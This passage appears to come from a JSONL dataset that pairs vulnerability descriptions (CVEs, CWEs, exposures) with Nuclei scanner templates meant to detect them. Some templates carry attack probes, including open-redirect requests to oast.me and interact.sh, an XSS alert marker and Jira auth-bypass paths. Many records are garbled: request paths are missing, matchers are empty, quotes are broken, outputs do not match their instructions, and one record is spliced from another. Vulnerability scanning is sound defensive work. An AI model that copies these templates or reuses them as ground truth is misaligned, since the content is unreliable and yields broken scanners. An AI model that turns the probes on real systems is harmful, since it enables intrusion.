bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n tags: cve,cve2023,xwiki,redirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me\" \n - \"{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2023-29204"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: parallels-html-client\n\ninfo:\n name: Parallels HTML5 Client Login Panel - Detect\n author: pdteam\n severity: info\n description: Parallels HTML5 Client login panel was detected.\n tags: panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/RASHTML5Gateway/\" \n matchers:\n - type: word\n words:\n - \"Parallels HTML5 Client\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: DigitalOcean Personal Access Token", "input": "Title: DigitalOcean Personal Access Token\nSummary: DigitalOcean Personal Access Token. Tags: digitalocean, exposure, token\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: digital-ocean-personal-token\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n description: DigitalOcean Personal Access Token\n tags: digitalocean,exposure,token,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "digital-ocean-personal-token"} {"instruction": "Generate a Nuclei template for: Pantheon upstream.yml Disclosure", "input": "Title: Pantheon upstream.yml Disclosure\nSummary: Pantheon upstream.yml Disclosure. Public Pantheon YAML Configuration Files might include sensitive info\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: pantheon-upstream\n\ninfo:\n name: Pantheon upstream.yml Disclosure\n author: DhiyaneshDK\n severity: low\n description: Public Pantheon YAML Configuration Files might include sensitive info\n tags: exposure,devops,patheon,config,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pantheon.upstream.yml\" \n matchers:\n - type: word\n words:\n - \"database:\" \n - \"protected_web_paths:\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "pantheon-upstream"} {"instruction": "Generate a Nuclei template for CVE-2023-36284", "input": "Title: SQL Injection in webkul qloapps\nSummary: An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: webkul qloapps\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-36284\n\ninfo:\n name: QloApps 1.6.0 - SQL Injection\n author: ritikchaddha\n severity: high\n description: An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.\n tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"QloApps\" \n part: body\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-36284"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vertex-tax-panel\n\ninfo:\n name: Vertex Tax Installer Panel - Detect\n author: ritikchaddha\n severity: info\n description: Vertex Tax Installer panel was detected.\n tags: panel,vertex,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Vertex Tax Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-6421", "input": "Title: Vulnerability (CWE-522) in w3eden download_manager\nSummary: The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.\nVulnerability Type: Vulnerability (CWE-522)\nSeverity: high\nAffected Products: w3eden download_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6421\n\ninfo:\n name: WordPress Download Manager - File Password Exposure\n author: ritikchaddha\n severity: medium\n description: The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.\n tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\"\" \n - \"op\":\"\" \n - \"Wrong Password\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-6421"} {"instruction": "Generate a Nuclei template for CVE-2020-5191", "input": "Title: Cross-Site Scripting (XSS) in phpgurukul hospital_management_system\nSummary: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: phpgurukul hospital_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-5191\n\ninfo:\n name: PHPGurukul Hospital Management System - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-5191"} {"instruction": "Generate a Nuclei template for CVE-2022-37190", "input": "Title: Unknown Vulnerability in cuppacms cuppacms\nSummary: CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: cuppacms cuppacms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-37190\n\ninfo:\n name: Cuppa CMS v1.0 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php.\n tags: cve2022,cve,rce,cuppa,authenticated,cuppacms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header_3\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-37190"} {"instruction": "Generate a Nuclei template for CVE-2022-30525", "input": "Title: OS Command Injection in zyxel usg_flex_100w_firmware and others\nSummary: A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: zyxel usg_flex_100w_firmware, zyxel usg_flex_200_firmware, zyxel usg_flex_500_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-30525\n\ninfo:\n name: Zyxel Firewall - OS Command Injection\n author: h1ei1,prajiteshsingh\n severity: critical\n description: An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: status\n status:\n - 500", "category": "cve", "severity": "critical", "id": "CVE-2022-30525"} {"instruction": "Generate a Nuclei template to detect Open Redirect", "input": "Title: Open Redirect (CWE-601)\nSummary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.\nVulnerability Type: Open Redirect\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: shibboleth-open-redirect\n\ninfo:\n name: Shibboleth SSO - Open Redirect\n author: aushack\n severity: medium\n description: Shibboleth SSO contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: redirect,shibboleth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Shibboleth.sso/Logout?return=https://{{randstr}}.interact.sh\" \n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 302", "category": "cwe", "severity": "high", "id": "CWE-601"} {"instruction": "Generate a Nuclei template for: Kiteworks PCN Panel - Detect", "input": "Title: Kiteworks PCN Panel - Detect\nSummary: Kiteworks PCN Panel - Detect. Kiteworks PCN Login Panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kiteworks-pcn-panel\n\ninfo:\n name: Kiteworks PCN Panel - Detect\n author: righettod\n severity: info\n description: Kiteworks PCN Login Panel was detected.\n tags: panel,kiteworks,login,detect,accellion,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/locales/login_en.json\" \n matchers:\n - type: word\n words:\n - \"Secured by Kiteworks\" \n - \"Return to sign in\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "kiteworks-pcn-panel"} {"instruction": "Generate a Nuclei template for: Salesforce Tableau Server - Detect", "input": "Title: Salesforce Tableau Server - Detect\nSummary: Salesforce Tableau Server - Detect. Detects Salesforce Tableau Server and extracts the buildid.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tableau-server-detect\n\ninfo:\n name: Salesforce Tableau Server - Detect\n author: TechbrunchFR,aringo\n severity: info\n description: Detects Salesforce Tableau Server and extracts the buildid.\n tags: tech,detect,tableau,salesforce,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"X-Tableau: Tableau Server\" \n - \"Server: Tableau\" \n part: header\n condition: or\n - type: word\n words:\n - \"VizPortalRun\" \n - \"vizportal\" \n part: body\n condition: or", "category": "generic", "severity": "info", "id": "tableau-server-detect"} {"instruction": "Generate a Nuclei template for: SpaceLogic C-Bus Home Panel - Detect", "input": "Title: SpaceLogic C-Bus Home Panel - Detect\nSummary: SpaceLogic C-Bus Home Panel - Detect. Tags: panel, spacelogic, login\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: spacelogic-cbus-panel\n\ninfo:\n name: SpaceLogic C-Bus Home Panel - Detect\n author: ritikchaddha\n severity: info\n description: SpaceLogic C-Bus Home Panel - Detect\n tags: panel,spacelogic,login,schneider-electric,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"SpaceLogic C-Bus Home\" \n - \"content=\"SpaceLogic C-Bus Home\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "spacelogic-cbus-panel"} {"instruction": "Generate a Nuclei template to detect Unrestricted Upload of File with Dangerous Type", "input": "Title: Unrestricted Upload of File with Dangerous Type (CWE-434)\nSummary: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.\nVulnerability Type: Unrestricted Upload of File with Dangerous Type\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: roxyfileman-fileupload\n\ninfo:\n name: Roxy Fileman 1.4.4 - Arbitrary File Upload\n author: DhiyaneshDK\n severity: high\n description: Roxy Fileman 1.4.4 is susceptible to remote code execution via the FORBIDDEN_UPLOADS setting, which is checked when renaming an existing file to a new file extension. An attacker can bypass this check and rename already uploaded files to any extension using the move function, which does not perform any checks.\n tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-434"} {"instruction": "Generate a Nuclei template for CVE-2023-1698", "input": "Title: OS Command Injection in wago compact_controller_100_firmware and others\nSummary: In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: wago compact_controller_100_firmware, wago edge_controller_firmware, wago pfc100_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1698\n\ninfo:\n name: WAGO - Remote Command Execution\n author: xianke\n severity: critical\n description: In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n tags: cve2023,cve,wago,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"license\":\" \n - \"\"name\":\" \n - \"uid=\" \n - \"gid=\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-1698"} {"instruction": "Generate a Nuclei template for CVE-2018-11133", "input": "Title: Cross-Site Scripting (XSS) in quest kace_system_management_appliance\nSummary: The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: quest kace_system_management_appliance\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-11133\n\ninfo:\n name: Quest KACE SMA /common/run_cross_report.php 'fmt' XSS\n author: iamnoooob,pdresearch\n severity: medium\n description: The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.\n tags: cve,cve2018,xss,quest,kace,sma,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"xls34403');alert(document.domain)//952');\" \n - \"k-run-report-message\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2018-11133"} {"instruction": "Generate a Nuclei template for: Security Center Plan - Disabled", "input": "Title: Security Center Plan - Disabled\nSummary: Security Center Plan - Disabled. Ensure your Alibaba Cloud Security Center is on the Advanced or Enterprise Edition for enhanced security features like malware detection, webshell identification, and anomaly recognition. Upgrading provides critical protection against undetected threats.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: security-plan-disabled\n\ninfo:\n name: Security Center Plan - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure your Alibaba Cloud Security Center is on the Advanced or Enterprise Edition for enhanced security features like malware detection, webshell identification, and anomaly recognition. Upgrading provides critical protection against undetected threats.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,security-center\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "security-plan-disabled"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: kwejkpl\n\ninfo:\n name: Kwejk.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Kwejk.pl user name information check was conducted.\n tags: osint,osint-images,kwejkpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://kwejk.pl/uzytkownik/{{user}}#/tablica/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Kwejki u\u017cytkownika\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Jira Unauthenticated Installed gadgets", "input": "Title: Jira Unauthenticated Installed gadgets\nSummary: Jira Unauthenticated Installed gadgets. Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets)\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jira-unauthenticated-installed-gadgets\n\ninfo:\n name: Jira Unauthenticated Installed gadgets\n author: philippedelteil\n severity: info\n description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets)\n tags: atlassian,jira,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rest/config/1.0/directory\" \n matchers:\n - type: word\n words:\n - \"jaxbDirectoryContents\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "jira-unauthenticated-installed-gadgets"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mastodon-polsocial\n\ninfo:\n name: Mastodon-pol.social User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mastodon-pol.social user name information check was conducted.\n tags: osint,osint-social,mastodon-polsocial,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://pol.social/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@pol.social\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: MongoD Server - Exposure", "input": "Title: MongoD Server - Exposure\nSummary: MongoD Server - Exposure. Tags: mongod, exposure, info-leak\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: mongod-exposure\n\ninfo:\n name: MongoD Server - Exposure\n author: DhiyaneshDk\n severity: low\n description: MongoD Server - Exposure\n tags: mongod,exposure,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"mongod\" \n - \"List all commands\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "mongod-exposure"} {"instruction": "Generate a Nuclei template for: Open Journal Systems Installer - Exposure", "input": "Title: Open Journal Systems Installer - Exposure\nSummary: Open Journal Systems Installer - Exposure. Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: ojs-installer\n\ninfo:\n name: Open Journal Systems Installer - Exposure\n author: DhiyaneshDK\n severity: high\n description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,ojs,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index/install\" \n - \"{{BaseURL}}/index.php/index/install\" \n matchers:\n - type: word\n words:\n - \"OJS Installation\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "ojs-installer"} {"instruction": "Generate a Nuclei template for CVE-2019-2578", "input": "Title: Unknown Vulnerability in oracle webcenter_sites\nSummary: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. While the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: oracle webcenter_sites\nIndicators: unauthorized", "output": "id: CVE-2019-2578\n\ninfo:\n name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control\n author: leovalcante\n severity: high\n description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.\n tags: cve,cve2019,oracle,wcs,auth-bypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "high", "id": "CVE-2019-2578"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: geo-webserver-detect\n\ninfo:\n name: GeoWebServer Detector Panel - Detect\n author: dhiyaneshDK,daffainfo\n severity: info\n description: GeoWebServer Detector panel was detected.\n tags: panel,geowebserver,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"<TITLE>GeoWebServer\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-2733", "input": "Title: Cross-Site Scripting (XSS) in open-emr openemr\nSummary: Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: open-emr openemr\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2733\n\ninfo:\n name: Openemr < 7.0.0.1 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"pricelevel\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-2733"} {"instruction": "Generate a Nuclei template for: Minimize container added capabilities", "input": "Title: Minimize container added capabilities\nSummary: Minimize container added capabilities. Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: minimize-added-capabilities\n\ninfo:\n name: Minimize container added capabilities\n author: princechaddha\n severity: high\n description: Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks.\n tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "minimize-added-capabilities"} {"instruction": "Generate a Nuclei template for: Drupal Security Checks", "input": "Title: Drupal Security Checks\nSummary: Drupal Security Checks. A simple workflow that runs all drupal related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: drupal-workflow\n\ninfo:\n name: Drupal Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all drupal related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "drupal-workflow"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Adobe Campaign", "input": "Title: Content-Security-Policy Bypass - Adobe Campaign\nSummary: Content-Security-Policy Bypass - Adobe Campaign. Tags: xss, csp-bypass, adobe-campaign\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: adobe-campaign-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Adobe Campaign\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Adobe Campaign\n tags: xss,csp-bypass,adobe-campaign,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"adobe.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "adobe-campaign-csp-bypass"} {"instruction": "Generate a Nuclei template for: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection", "input": "Title: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\nSummary: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-userfeedback-lite\n\ninfo:\n name: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\n author: ricardomaia\n severity: info\n description: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/userfeedback-lite/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-userfeedback-lite"} {"instruction": "Generate a Nuclei template for: Toshiba TopAccess - Default-Login", "input": "Title: Toshiba TopAccess - Default-Login\nSummary: Toshiba TopAccess - Default-Login. Tags: topaccess, default-login, misconfig\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: topaccess-default-login\n\ninfo:\n name: Toshiba TopAccess - Default-Login\n author: ritikchaddha\n severity: high\n description: Toshiba TopAccess - Default-Login\n tags: topaccess,default-login,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Administrator\" \n - \"STATUS_OKAudiobookshelf\" \n - \"content=\"Audiobookshelf\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "audiobookshelf-panel"} {"instruction": "Generate a Nuclei template for CVE-2022-0540", "input": "Title: Authentication Bypass in atlassian jira_data_center and others\nSummary: A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: atlassian jira_data_center, atlassian jira_server, atlassian jira_service_management\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0540\n\ninfo:\n name: Atlassian Jira Seraph - Authentication Bypass\n author: DhiyaneshDK\n severity: critical\n description: Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n tags: cve,cve2022,atlassian,jira,exposure,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;\" \n - \"{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;\" \n matchers:\n - type: word\n words:\n - \"General Insight Configuration\" \n part: 